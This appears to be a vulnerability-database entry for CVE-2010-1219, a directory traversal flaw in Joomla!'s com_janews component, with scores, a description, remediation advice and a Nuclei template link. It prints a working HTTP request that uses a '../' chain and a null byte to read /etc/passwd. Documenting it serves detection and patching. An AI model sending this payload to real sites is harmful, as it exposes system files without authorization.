🔙 목록으로 돌아가기

CVE-2010-1219: Joomla! Component com_janews - Local File Inclusion

TitleJoomla! Component com_janews - Local File Inclusion
Authordaffainfo
SeverityMedium
ImpactSuccessful exploitation of this vulnerability can lead to unauthorized access to sensitive files and potential remote code execution.
RemediationUpgrade to the latest version to mitigate this vulnerability.
CVSS Score6.8
EPSS Score0.27216
CVE IDCVE-2010-1219
CWE IDCWE-22
Tags cve cve2010 joomla lfi edb com_janews vuln

🔍 Vulnerability Description

A directory traversal vulnerability in the JA News (com_janews) component 1.0 for Joomla! allows remote attackers to read arbitrary local files via a .. (dot dot) in the controller parameter to index.php.

🌐 HTTP Request

GET /index.php?option=com_janews&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_16) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.3 Safari/605.1.15
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2010/CVE-2010-1219.yaml

🦈 Packet Capture: ⬇️ Download cve-2010-1219.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A